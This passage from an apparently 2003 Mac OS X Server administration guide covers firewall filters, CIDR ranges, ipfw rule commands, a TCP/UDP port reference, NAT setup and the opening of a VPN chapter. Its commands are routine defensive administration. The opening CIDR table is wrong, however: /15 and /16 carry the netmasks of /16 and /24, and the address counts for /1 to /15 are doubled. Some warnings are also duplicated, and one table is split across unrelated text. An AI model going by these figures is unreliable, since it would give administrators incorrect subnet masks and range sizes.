subnet masks.
CIDR
Corresponds to Netmask
Number of addresses
in the range
/1
128.0.0.0
4.29x109
/2
192.0.0.0
2.14x109
/3
224.0.0.0
1.07x109
/4
240.0.0.0
5.36x108
/5
248.0.0.0
1.34x108
/6
252.0.0.0
6.71x107
/7
254.0.0.0
3.35x107
/8
255.0.0.0
1.67x107
/9
255.128.0.0
8.38x106
/10
255.192.0.0
4.19x106
/11
255.224.0.0
2.09x106
/12
255.240.0.0
1.04x106
/13
255.248.0.0
5.24x105
/14
255.252.0.0
2.62x105
/15
255.255.0.0
1.31x105
/16
255.255.255.0
65536
/17
255.255.128.0
32768
/18
255.255.192.0
16384
/19
255.255.224.0
8192
/20
255.255.240.0
4096
/21
255.255.248.0
2048
/22
255.255.252.0
1024
/23
255.255.254.0
512
/24
255.255.255.0
256
/25
255.255.255.128
128
/26
255.255.255.192
64
/27
255.255.255.224
32
/28
255.255.255.240
16
/29
255.255.255.248
8
/30
255.255.255.252
4
/31
255.255.255.254
2
/32
255.255.255.255
1
LL2351.Book Page 46 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
47
Using Address Ranges
When you create filters using Server Admin, you enter an IP address and the CIDR
format subnet mask. Server Admin shows you the resulting address range, and you can
change the range by modifying the subnet mask. When you indicate a range of
possible values for any segment of an address, that segment is called a wildcard. The
following table gives examples of address ranges created to achieve specific goals.
Rule Mechanism and Precedence
The filter rules in the General panel operate in conjunction with the rules shown in the
Advanced panel. Usually, the broad rules in the Advanced panel block access for all
ports. These are lower-priority rules and take effect after the rules in the General panel.
The rules created with the General panel open access to specific services, and are
higher priority. They take precedence over those created in the Advanced panel. If you
create multiple filters in the Advanced panel, a filter’s precedence is determined by the
rule number which is the rule’s order in the Advanced panel. Rules in the advanced
panel can be re-ordered by dragging the rule within the list.
For most normal uses, opening access to designated services in the advanced panel is
sufficient. If necessary, you can add additional rules using the Advanced panel, creating
and ordering them as needed.
Multiple IP Addresses
A server can support multiple homed IP addresses, but firewall service applies one set
of filters to all server IP addresses. If you create multiple alias IP addresses, then the
filters you create will apply to all of those IP addresses.
Goal
Sample
IP address
Enter this in the
address field:
Address range
affected
Create a filter that specifies a
single IP address.
10.221.41.33
10.221.41.33 or
10.221.41.33/32
10.221.41.33
(single address)
Create a filter that leaves the
fourth segment as a wildcard.
10.221.41.33
10.221.41.33/24
10.221.41.0 to
10.221.41.255
Create a filter that leaves part of
the third segment and all of the
fourth segment as a wildcard.
10.221.41.33
10.221.41.33/22
10.221.40.0 to
10.221.43.255
Create a filter that applies to all
incoming addresses.
Select “Any”
All IP addresses
LL2351.Book Page 47 Monday, September 8, 2003 2:47 PM
48
Chapter 3 IP Firewall Service
Setting Up Firewall Service for the First Time
Once you’ve decided which filters you need to create, follow these overview steps to
set up firewall service. If you need more help to perform any of these steps, see
“Managing Firewall Service” on page 49 and the other topics referred to in the steps.
Step 1: Learn and plan
If you’re new to working with IP Firewall, learn and understand firewall concepts, tools,
and features of Mac OS X Server and BIND. For more information, see “Understanding
Firewall Filters” on page 45.
Then plan your IP Firewall Service by planning which services you want to provide
access to. Mail, web, and FTP services generally require access from computers on the
Internet. File and print services will most likely be restricted to your local subnet.
Once you decide which services you want to protect using firewall service, you need to
determine which IP addresses you want to allow access to your server, and which IP
addresses you want to deny access to your server. Then you can create the appropriate
filters.
Step 2: Start firewall service
In Server Admin, select Firewall and click Start Service. By default, this blocks all
incoming ports except those used to configure the server remotely. If you’re
configuring the server locally, turn off external access immediately.
Step 3: Create an IP address group that filters will apply to
By default, there is an address group created for all incoming IP addresses. Filters
applied to this group will effect all incoming network traffic.
You can create additional groups based on source IP number or destination IP number.
See “Creating an Address Group” on page 50 for more information.
Step 4: Add filters to the IP filter list
Read “Understanding Firewall Filters” on page 45 to learn how IP filters work and how
to create them. You use this to further all other services, strengthen your network
security, and manage your network traffic through the firewall.
For information about creating a new filter, see “Creating an Advanced IP Filter for TCP
ports” on page 51.
Important: If you add or change a filter after starting firewall service, the new filter
will affect connections already established with the server. For example, if you deny
all access to your FTP server after starting firewall service, computers already
connected to your FTP server will be disconnected.
LL2351.Book Page 48 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
49
Step 5: Save firewall service changes
Once you have configured your filters and determined which services to allow, save
your changes so the new settings take effect.
Managing Firewall Service
This section gives step-by-step instructions for starting, stopping, and configuring
firewall address groups and filters.
Starting and Stopping Firewall Service
By default, firewall service blocks all incoming TCP connections and allows all UDP
connections. Before you turn on firewall service, make sure you’ve set up filters
allowing access from IP addresses you choose. Otherwise, no one will have access to
your server.
To start or stop firewall service:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Start Firewall.
When the service is started, the Stop Service button is available.
Opening the Firewall for Standard Services
By default, firewall service blocks all incoming TCP connections and allows all UDP
connections. Before you turn on firewall service, make sure you’ve set up filters
allowing access from IP addresses you choose; otherwise, no one will have access to
your server.
You can easily allow standard services through the firewall without advanced and
extensive configuration. Standard services include (but are not limited to):
• Web service
• Apple File service
• Windows File service
• FTP service
• Printer Sharing
Important: If you add or change a filter after starting firewall service, the new filter
will affect connections already established with the server. For example, if you deny
all access to your FTP server after starting firewall service, computers already
connected to your FTP server will be disconnected.
Important: If you add or change a filter after starting firewall service, the new filter
will affect connections already established with the server. For example, if you deny
all access to your FTP server after starting firewall service, computers already
connected to your FTP server will be disconnected.
LL2351.Book Page 49 Monday, September 8, 2003 2:47 PM
50
Chapter 3 IP Firewall Service
• DNS/Rendezvous
• ICMP Echo Reply (incoming pings)
• IGMP (Internet Gateway Multicast Protocol)
• PPTP VPN
• L2TP VPN
• QTSS media streaming
• iTunes Music Sharing
To open the firewall for standard services:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the Any address group.
If you want to restrict or designate IP addresses for a standard service, you should
create an address group rather than use the Any address group. See “Creating an
Address Group” on page 50 for more information.
5 Select the services you want to allow.
6 Click Save.
Creating an Address Group
You can define groups of IP addresses for your firewall filters. These groups are used to
organize and target the filters. The default address group is for all addresses.
Addresses can be listed as individual addresses (192.168.2.2) or IP address and CIDR
format netmask (192.168.2.0/24).
To create an address group:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Click Add beneath the Address Group pane.
5 Enter a group name.
6 Enter the addresses and subnet mask you want the filters to effect.
7 Click OK.
Important: If you add or change a filter after starting firewall service, the new filter
will affect connections already established with the server. For example, if you deny
all access to your FTP server after starting firewall service, computers already
connected to your FTP server will be disconnected.
LL2351.Book Page 50 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
51
Editing or Deleting an Address Group
You can edit your address groups to change the range of IP addresses effected. The
default address group is for all addresses. You can remove address groups from your
firewall filter list. The filters associated with those addresses are also deleted.
Addresses can be listed as individual addresses (192.168.2.2) or IP address and CIDR
format netmask (192.168.2.0/24).
To edit or delete an address group:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the group name from the Address Group pane.
5 Click the Edit button beneath the Address Group pane to edit it.
Click the Delete button beneath the Address Group pane to delete it.
6 Edit the Group name or addresses as needed.
7 Click OK.
8 Click Save.
Duplicating an Address Group
You can duplicate address groups from your firewall filter list. This can help speed up
configuration of similar address groups.
To duplicate an address group:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the group name from the Address Group pane.
5 Click the Duplicate button beneath the Address Group pane.
Creating an Advanced IP Filter for TCP ports
You can use the Advanced Settings pane to configure very specific filters for TCP ports.
IP filters contain an IP address and a subnet mask. You can apply a filter to all IP
addresses, a specific IP address, or a range of IP addresses.
Addresses can be listed as individual addresses (192.168.2.2) or IP address and CIDR
netmask (192.168.2.0/24).
LL2351.Book Page 51 Monday, September 8, 2003 2:47 PM
52
Chapter 3 IP Firewall Service
To create an IP filter for TCP ports:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Advanced tab.
4 Click the New button.
Alternatively, you can select a rule similar to the one you want to create, and click
Duplicate then Edit.
5 Select whether this filter will allow or deny access in the Action pop-up menu.
6 Choose TCP from the Protocol pop-up menu.
7 Choose a TCP service from the pop-up menu.
If you want to select a nonstandard service port, choose Other.
8 If desired, choose to log packets that match the filter.
9 Enter the Source IP address range you want to filter.
If you want it to apply to any address, choose Any from the pop-up menu.
If you have selected a nonstandard service port, enter the source port number.
10 Enter the Destination IP address range you want to filter.
If you want it to apply to any address, choose Any from the pop-up menu.
If you have selected a nonstandard service port, enter the source port number.
11 Choose which network interface this filter applies to.
12 Click OK.
13 Click Save to apply the filter immediately.
Creating an Advanced IP Filter for UDP Ports
You can use the Advanced Settings pane to configure very specific filters for UDP
ports. Many services use User Datagram Protocol (UDP) to communicate with the
server. By default, all UDP connections are allowed. You should apply filters to UDP
ports sparingly, if at all, because “deny” filters could create severe congestion in your
server traffic.
If you filter UDP ports, don’t select the “Log all allowed packets” option in the filter
configuration windows in Server Admin. Since UDP is a “connectionless” protocol, every
packet to a UDP port will be logged if you select this option.
You should also allow UDP port access for specific services, including:
• DNS
• DHCP
• SLP
• Windows Name Service browsing
LL2351.Book Page 52 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
53
• Remote Desktop
• NFS
• NetInfo
UDP ports above 1023 are allocated dynamically by certain services, so their exact port
numbers may not be determined in advance.
Addresses can be listed as individual addresses (192.168.2.2) or IP address and CIDR
netmask (192.168.2.0/24).
To easily configure UDP access for these ports, see “Opening the Firewall for Standard
Services” on page 49. If you need more advanced firewall settings for these basic UDP
services, use the following instructions to create them.
To create an IP filter for UDP ports:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Advanced tab.
4 Click the New button.
Alternatively, you can select a rule similar to the one you want to create, and click
Duplicate then Edit.
5 Select whether this filter will allow or deny access in the Action pop-up menu.
6 Choose UDP from the Protocol pop-up menu.
7 Choose a UDP service from the pop-up menu.
If you want to select a nonstandard service port, choose Other.
8 If desired, choose to log packets that match the filter.
9 Enter the Source IP address range you want to filter.
If you want it to apply to any address, choose Any from the pop-up menu.
If you have selected a nonstandard service port, enter the source port number.
10 Enter the Destination IP address range you want to filter.
If you want it to apply to any address, choose Any from the pop-up menu.
If you have selected a nonstandard service port, enter the source port number.
11 Choose which network interface this filter applies to.
12 Click OK.
13 Click Save to apply the filter immediately.
LL2351.Book Page 53 Monday, September 8, 2003 2:47 PM
54
Chapter 3 IP Firewall Service
Editing Advanced IP Filters
If you edit a filter after turning on firewall service, your changes affect connections
already established with the server. For example, if any computers are connected to
your Web server, and you change the filter to deny all access to the server, connected
computers will be disconnected.
To edit advanced IP filters:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Advanced tab.
4 Select a filter and click Duplicate, Edit, or Delete. If you’re deleting a filter, you’ve
finished.
5 Make any changes to the settings, then click Save.
Changing the Default Filter
If the server receives a packet using a port or IP address to which none of your filters
apply, firewall service uses the Default filter. You can set the Default filter to either deny
or allow these packets for specific IP addresses. By default the Default filter denies
access.
If you need to change the Default filter to allow access, you can. However, you
shouldn’t take this action lightly. Changing the default to allow means you must
explicitly deny access to your services by setting up specific port filters for all the
services that need protection.
It is recommended that you leave the Default filter in place and use the General panel
to create higher priority rules which allow access to designated services.
To change the Default setting:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select Default and click Edit.
5 Make any changes to the settings, then Click Save.
LL2351.Book Page 54 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
55
Monitoring Firewall Service
Firewalls are a networks first line of defense against malicious computer users
(commonly called “hackers”). To maintain the security of your computers and users, you
need to monitor firewall activity and deter potential threats. This sections explains how
to log and monitor your firewall.
Viewing the Firewall Status Overview
The Status Overview shows a simple summary of the firewall service. It shows whether
or not the service is running and which filters rules are active.
To see the overview:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click the Overview button.
Setting Up Logs for Firewall Service
You can log only the packets that are denied by the filters you set, only the packets
that are allowed, or both. Both logging options can generate a lot of log entries, which
can fill up disk space and degrade the performance of the server. You should use “Log
all allowed packets” only for limited periods of time.
You can choose to log allowed packets, denied packets, and a designated number of
packets.
To set up logs:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Select the logging options you want.
5 Click Save to start logging.
Viewing the Firewall Log
Each filter you create in Server Admin corresponds to one or more rules in the
underlying firewall software. Log entries show you the rule applied, the IP address of
the client and server, and other information.
To view the log for firewall service:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Log tab.
Here are some examples of firewall log entries and how to read them.
LL2351.Book Page 55 Monday, September 8, 2003 2:47 PM
56
Chapter 3 IP Firewall Service
Log Example 1
Dec 12 13:08:16 ballch5 mach_kernel: ipfw: 65000 Unreach TCP
10.221.41.33:2190 192.168.12.12:80 in via en0
This entry shows that firewall service used rule 65000 to deny (unreach) the remote
client at 10.221.41.33:2190 from accessing server 192.168.12.12 on Web port 80 via
Ethernet port 0.
Log Example 2
Dec 12 13:20:15 mayalu6 mach_kernel: ipfw: 100 Accept TCP
10.221.41.33:721 192.168.12.12:515 in via en0
This entry shows that firewall service used rule 100 to allow the remote client at
10.221.41.33:721 to access the server 192.168.12.12 on the LPR printing port 515 via
Ethernet port 0.
Log Example 3
Dec 12 13:33:15 smithy2 mach_kernel: ipfw: 10 Accept TCP
192.168.12.12:49152 192.168.12.12:660 out via lo0
This entry shows that firewall service used rule 10 to send a packet to itself on port 660
via the loopback device 0.
Viewing Denied Packets
Viewing denied packets can help you identify problems and troubleshoot firewall
service.
To view denied packets:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Make sure “Log denied packets” is checked.
5 View log entries in Server Admin by clicking Log.
Viewing Packets Logged by Filter Rules
Viewing filtered packets can help you identify problems and troubleshoot firewall
service.
To view filtered packets:
1 Turn on logging of filtered packets in filter editing window.
See “Editing Advanced IP Filters” on page 54 if you have not turned on logging for a
particular filter.
2 To view log entries in Server Admin, choose Firewall from the Computers & Services list.
3 Click Log.
LL2351.Book Page 56 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
57
Practical Examples
The IP filters you create work together to provide security for your network. The
examples that follow show how to use filters to achieve some specific goals.
Block Access to Internet Users
This section shows you, as an example, how to allow users on your subnet access to
your server’s Web service, but deny access to the general public on the Internet:
To do this:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the Any address group.
5 Make sure that Web Service is disabled in the right pane.
6 Click the Add button to create an address range.
7 Name the address group.
8 Add the local network address range.
This is done by using an example address from the network with its network mask in
CIDR notation. For example, if a user has an address of 192.168.1.20 and the network
mask is 255.255.255.0, then enter 192.168.1.20/24.
9 Click OK.
10 Select your newly created address group.
11 Select “Web Service” in the right pane to enable web access.
12 Click Save.
Block Junk Mail
This section shows you, as an example, how to reject email from a junk mail sender
with an IP address of 17.128.100.0 and accept all other Internet email:
LL2351.Book Page 57 Monday, September 8, 2003 2:47 PM
58
Chapter 3 IP Firewall Service
To do this:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the Any address group.
5 Enable “SMTP Mail” in the right pane.
6 Click the Add button to create an address range.
7 Name the address group.
8 Enter 17.128.100.0 to the address range to indicate the junk mail sender’s address.
9 Click OK.
10 Select your newly created address group.
11 Deselect “SMTP Mail” in the right pane to disable mail transfer.
12 Click Save.
Allow a Customer to Access the Apple File Server
This section shows you, as an example, how to allow a customer with an IP address of
10.221.41.33 to access an Apple file server.
To do this:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the Any address group.
5 Disable “Apple File Service” in the right pane.
6 Click the Add button to create an address range.
7 Name the address group.
8 Enter 10.221.41.33 to the address range to indicate the customer’s address.
9 Click OK.
10 Select your newly created address group.
11 Select “Apple File Service” in the right pane to enable file access.
12 Click Save.
Important: Set up very specific address ranges in filters you create to block incoming
SMTP mail. For example, if you set a filter on port 25 to deny mail from all addresses,
you’ll prevent any mail from being delivered to your users.
LL2351.Book Page 58 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
59
Common Network Administration Tasks That Use
Firewall Service
Your firewall is the first line of defense against unauthorized network intruders,
malicious users, and network virus attacks. There are many ways that such attacks can
harm your data or use your network resources. This section lists a few of the common
uses of firewall service in network administration.
Preventing Denial-of-Service (DoS) Attacks
When the server receives a TCP connection request from a client to whom access is
denied, by default it sends a reply rejecting the connection. This stops the denied client
from resending over and over again. However, a malicious user can generate a series of
TCP connection requests from a denied IP address and force the server to keep
replying, locking out others trying to connect to the server. This is one type of Denial-
of-Service attack.
To prevent ping denial-of-service attacks:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the Any address group.
5 Deselect “ICMP Echo (ping) reply.”
6 Click Save.
Controlling or Enabling Peer-to-Peer Network Usage
Sometimes network administrators need to control the use of Peer-to-Peer (P2P) file
sharing applications. Such applications might use network bandwidth and resources
inappropriately or disproportionately. P2P file sharing might also pose a security or
intellectual property risk for a business.
You can cut off P2P networking by blocking all traffic incoming and outgoing on the
port number used by the P2P application. You’ll have to determine the port used for
each P2P network in question. By default, Mac OS X Server’s firewall blocks all ports not
specifically opened.
You can choose to limit P2P network usage to IP addresses behind the firewall. To do
so, you’ll need to open the P2P port for your LAN interface, but continue to block the
port on the interface connected to the Internet (WAN interface). To learn how to make
a firewall filter, see “Creating an Advanced IP Filter for TCP ports” on page 51.
Important: Denial-of-Service attacks are somewhat rare, so make these settings only
if you think your server may be vulnerable to an attack. If you deny ICMP echo replies,
services that use ping to locate network services will be unable to detect your server.
LL2351.Book Page 59 Monday, September 8, 2003 2:47 PM
60
Chapter 3 IP Firewall Service
Controlling or Enabling Network Game Usage
Sometimes network administrators need to control the use of network games. The
games might use network bandwidth and resources inappropriately or
disproportionately.
You can cut off network gaming by blocking all traffic incoming and outgoing on the
port number used by the game. You’ll have to determine the port used for each
network game in question. By default, Mac OS X Server’s firewall blocks all ports not
specifically opened.
You can choose to limit network game usage to IP addresses behind the firewall. To do
so, you’ll need to open the appropriate port on your LAN interface, but continue to
block the port on the interface connected to the Internet (WAN interface). Some games
require a connection to a gaming service for play, so this may not be effective. To learn
how to make a firewall filter, see “Creating an Advanced IP Filter for TCP ports” on
page 51.
You can open the firewall to certain games, allowing network games to connect to
other players and game services outside the firewall. To do this, you’ll need to open up
the appropriate port on your LAN and WAN interface. Some games require more than
one port to be open. Consult the game’s documentation for networking details. To
learn how to make a firewall filter, see “Creating an Advanced IP Filter for TCP ports” on
page 51.
Advanced Configuration
You might prefer to use a command-line interface and conventional configuration file
to configure Mac OS X Server’s firewall service. For example, you might have an existing
ipfw configuration file that you want to migrate to a new Mac OS X Server installation.
Alternately, you might need greater control of the firewall for troubleshooting or
intrusion detection.
Background
When you click the Save button in Server Admin, all the old rules are flushed and new
rules are loaded and apply immediately. This happens whether the IP firewall service is
started or stopped. If the IP firewall service is running, it is stopped long enough to
reload the rules, and it automatically restarts. The new rules are loaded from three
sources:
• The rules from both the General and the Advanced panels (stored in /etc/ipfilter/
ip_address_groups.plist).
• The manually configured ipfw rules, if any (stored in /etc/ipfilter/ipfw.conf).
• The NAT divert rule, if the NAT service is running.
LL2351.Book Page 60 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
61
If you want to put your own rules in the ipfw.conf file, you can use a template that is
installed at /etc/ipfilter/ipfw.conf.default. Duplicate the file, rename it, and edit it as
indicated in the template’s comments.
Precautions
By using the Advanced panel or creating your own rules, you can put the server in a
state that is completely cut off from network access. This might require a reboot in
single-user-mode to restore network access. To avoid this, consider adding a cron job to
disable the firewall periodically while you are testing rules. Be sure to disable this cron
job when the machine is put into production.
The following command disables the firewall:
sudo sysctl -w net.inet.ip.fw.enable=0
And this enables it:
sudo sysctl -w net.inet.ip.fw.enable=1
Neither of these operations change the rules loaded into the firewall, they just
determine whether those rules are applied.
Creating IP Filter Rules Using ipfw
You can use the ipfw command in conjunction with the firewall module of Server
Admin when you want to:
• Display rules created by the firewall module. Each filter translates into one or more
rules.
• Create filters with characteristics that can’t be defined using the firewall module. For
example, you may want to use rules specific to a particular kind of IP protocol. Or you
may want to filter or block outgoing packets.
• Count the number of times rules are applied.
If you use ipfw, make sure you don’t modify rules created using the firewall module.
Changes you make to firewall module rules are not permanent. Firewall service
recreates any rules defined using the firewall module whenever the service is restarted.
Here is a summary of how the firewall module assigns rule numbers:
Rule number
Used by firewall module for
10
Loop back.
20
Discarding any packet from or to 127.0.0.0/8 (broadcast).
30
Discarding any packet from 224.0.0.0/3 (broadcast).
40
Discarding TCP packets to 224.0.0.0/3 (broadcast).
100–64000
User-defined port-specific filters.
63200
Denying access for icmp echo reply. Created when “Deny ICMP
echo reply” is selected in the Advanced pane of the Configure
Firewall window.
LL2351.Book Page 61 Monday, September 8, 2003 2:47 PM
62
Chapter 3 IP Firewall Service
Reviewing IP Filter Rules
To review the rules currently defined for your server, use the Terminal application to
submit the ipfw show command. The show command displays four columns of
information:
When you type:
ipfw show
You will see information similar to this:
0010 260
32688
allow log ip from any to any via lo*
0020 0
0
deny log ip from 127.0.0.0/8 to any in
0020 0
0
deny log ip from any to 127.0.0.0/8 in
0030 0
0
deny log ip from 224.0.0.0/3 to any in
0040 0
0
deny log tcp from any to 224.0.0.0/3 in
001001
52
allow log tcp from 111.222.33.3 to 111.222.31.3 660
in
...
Creating IP Filter Rules
To create new rules, use the ipfw add command. The following example defines rule
200, a filter that prevents TCP packets from a client with IP address 10.123.123.123 from
accessing port 80 of the system with IP address 17.123.123.123:
ipfw add 200 deny tcp from 10.123.123.123 to 17.123.123.123 80
63300
Denying access for igmp. Created when Deny IGMP is selected in
the Advanced pane of the Configure Firewall window.
63400
Allowing any TCP or UDP packet to access port 111 (needed by
NetInfo). Created when a shared NetInfo domain is found on the
server.
63500
Allowing user-specified TCP and UDP packets to access ports
needed for NetInfo shared domains. You can configure NetInfo to
use a static port or to dynamically select a port from 600 through
1023. Then use the Configure Firewall window to allow all or
specific clients to access those ports.
64000–65000
User-defined filters for Default.
Rule number
Used by firewall module for
Column
Information
1
The rule number. The lower the number, the higher the priority of
the rule.
2
The number of times the filter has been applied since it was
defined.
3
The number of bytes to which the filter has been applied.
4
A description of the rule.
LL2351.Book Page 62 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
63
Deleting IP Filter Rules
To delete a rule, use the ipfw delete command. This example deletes rule 200:
ipfw delete 200
For more information, consult the man pages for ipfw.
Port Reference
The following tables show the TCP and UDP port numbers commonly used by
Mac OS X computers and Mac OS X Servers. These ports can be used when you’re
setting up your IP filters. See the website www.faqs.org/rfcs to view the RFCs
referenced in the tables.
TCP port
Used for
Reference
7
echo
RFC 792
20
FTP data
RFC 959
21
FTP control
RFC 959
22
ssh (secure shell)
23
Telnet
RFC 854
25
SMTP (email)
RFC 821
53
DNS
RFC 1034
79
Finger
RFC 1288
80
HTTP (Web)
RFC 2068
88
Kerberos
RFC 1510
106
Open Directory Password Server
(along with 3659)
110
POP3 (email)
RFC 1081
111
Remote Procedure Call (RPC)
RFC 1057
113
AUTH
RFC 931
115
sftp
119
NNTP (news)
RFC 977
123
Network Time Server
synchronization (NTP)
RFC 1305
137
Windows Names
138
Windows Browser
139
Windows file and print (SMB)
RFC 100
143
IMAP (email access)
RFC 2060
LL2351.Book Page 63 Monday, September 8, 2003 2:47 PM
64
Chapter 3 IP Firewall Service
311
AppleShare IP remote Web
administration, Server Monitor,
Server Admin (servermgrd),
Workgroup Manager
(DirectoryService)
389
LDAP (directory)
Sherlock 2 LDAP search
RFC 2251
427
SLP (service location)
443
SSL (HTTPS)
514
shell
515
LPR (printing)
RFC 1179
532
netnews
548
AFP (AppleShare)
554
Real-Time Streaming Protocol
(QTSS)
RFC 2326
600–1023
Mac OS X RPC-based services
(for example, NetInfo)
625
Remote Directory Access
626
IMAP Administration (Mac OS X
mail service and AppleShare IP
6.x mail)
636
LDAP SSL
660
Server Settings, Server Manager
687
AppleShare IP Shared Users and
Groups, Server Monitor, Server
Admin (servermgrd)
749
Kerberos administration using
the kadmind command-line tool
1220
QTSS Admin
1694
IP Failover
1723
PPTP VPN
RFC 2637
2049
NFS
2236
Macintosh Manager
3031
Program Linking
3659
Open Directory Password Server
(along with 106)
7070
Real-Time Streaming Protocol
(QTSS)
TCP port
Used for
Reference
LL2351.Book Page 64 Monday, September 8, 2003 2:47 PM
Chapter 3 IP Firewall Service
65
8000–8999
Web service
16080
Web service with performance
cache
UDP port
Used for
Reference
7
echo
53
DNS
67
DHCP server (BootP)
68
DHCP client
69
Trivial File Transfer Protocol
(TFTP)
111
Remote Procedure Call (RPC)
123
Network Time Protocol
RFC 1305
137
Windows Name Service (WINS)
138
Windows Datagram Service
161
Simple Network Management
Protocol (SNMP)
427
SLP (service location)
497
Retrospect
513
who
514
Syslog
554
Real-Time Streaming Protocol
(QTSS)
600–1023
Mac OS X RPC-based services
(for example, NetInfo)
985
NetInfo (when a shared domain
is created using NetInfo Domain
Setup)
2049
Network File System (NFS)
3031
Program Linking
3283
Apple Network Assistant, Apple
Remote Desktop
5353
Rendezvous (mDNSResponder)
6970 and up
QTSS
7070
Real-Time Streaming Protocol
alternate (QTSS)
TCP port
Used for
Reference
LL2351.Book Page 65 Monday, September 8, 2003 2:47 PM
66
Chapter 3 IP Firewall Service
Where to Find More Information
For more information about ipfw:
You can find more information about ipfw, the process which controls IP firewall
service, by accessing its man page. It explains how to access its features and implement
them. To access the man page use the Terminal application to enter:
man ipfw
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs. The “Port Reference” section contains several
RFC numbers for various protocols.
Additionally, important multicast addresses are documented in the most recent
Assigned Numbers RFC, currently RFC 1700.
LL2351.Book Page 66 Monday, September 8, 2003 2:47 PM
4
67
4 NAT Service
Network Address Translation (NAT) is sometimes referred to as IP masquerading, or IP
aliasing. NAT is used to allow multiple computers access to the Internet with only one
assigned IP address. NAT allows you to create a private network which accesses the
Internet through a NAT router or gateway.
The NAT router takes all the traffic from your private network and remembers which
internal address made the request. When the NAT router receives the response to the
request, it forwards it to the originating computers. Traffic that originates from the
Internet does not reach any of the computers behind the NAT router unless Port
forwarding is enabled.
Enabling NAT on Mac OS X Server requires detailed control over DHCP, so DHCP is
configured separately in Server Admin. To learn more about DHCP, see Chapter 1,
“DHCP Service,” on page 7.
Enabling NAT also automatically creates a divert rule to the Firewall configuration.
Starting and Stopping NAT Service
You use Server Admin to start and stop NAT service on your default network interface.
Starting NAT service also starts DHCP for the default interface.
To start NAT service:
1 In Server Admin, select NAT from the Computers & Services pane.
2 Click Start Service.
When the service is running, Stop Service becomes available.
LL2351.Book Page 67 Monday, September 8, 2003 2:47 PM
68
Chapter 4 NAT Service
Configuring NAT Service
You use Server Admin to indicate which network interface is connected to the Internet
or other external network.
To configure NAT service:
1 In Server Admin, select NAT from the Computers & Services pane.
2 Click Settings.
3 Choose the network interface from the “Share your connection from:” pop-up menu.
This interface should be the one that connects to the Internet or external network.
4 Click Save.
Monitoring NAT Service
You might want to monitor your NAT service for troubleshooting and security. This
section describes the NAT status overview and monitoring NAT divert activity.
Viewing the NAT Status Overview
The NAT status overview allows you to see if the service is running, and how many
protocol links are active.
To see the overview:
1 In Server Admin, choose NAT Service from the Computers & Services list.
2 Click the Overview button.
Viewing NAT Activity
When the NAT service is running, it creates a packet divert filter in the IP Firewall
service. You can view NAT packet divert events which have been logged by the firewall
service. The logs are useful for network troubleshooting and configuration. To
troubleshoot NAT, you should create the rule manually and enable logging for the
packets allowed by the rule.
LL2351.Book Page 68 Monday, September 8, 2003 2:47 PM
Chapter 4 NAT Service
69
To view the NAT divert log:
1 In the Terminal application enter:
ipfw add 10 divert natd all from any to any via <interface>
Where <interface> is the network interface selected in the NAT section of
Server Admin.
2 In Server Admin, choose Firewall from the Computers & Services list.
3 Click Settings.
4 Select the Advanced tab.
5 Select the rule that was just created.
6 Click the Edit button.
7 Choose to log packets that match the filter.
8 Click OK.
9 In Server Admin, choose NAT Service from the Computers & Services list.
10 Click Settings.
11 Click Logging.
12 Enable logging.
13 Click Save.
14 Click the Log button to view the log.
Where to Find More Information
For more information about natd:
You can find more information about natd, the daemon process which controls NAT
service, by accessing its man page. It explains how to access its features and implement
them. To access the man page use the Terminal application to enter:
man natd
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs.
For NAT descriptions, see RFC 1631 and RFC 3022.
LL2351.Book Page 69 Monday, September 8, 2003 2:47 PM
LL2351.Book Page 70 Monday, September 8, 2003 2:47 PM
5
71
5 VPN Service
Virtual Private Network (VPN) is two or more computers or networks (nodes) connected
by a private link of encrypted data. This link simulates a local connection, as if the
remote computer were attached to the local area network (LAN).
VPNs allow users at home or otherwise away from the LAN to securely connect to it
using any network connection, such as the Internet. From the user’s perspective, the
VPN connection appears as a dedicated private link.
VPN technology also allows an organization to connect branch offices over the
Internet, while maintaining secure communications. The VPN connection across the
Internet acts as a wide area network (WAN) link between the sites.
VPNs have several advantages for organizations whose computer resources are
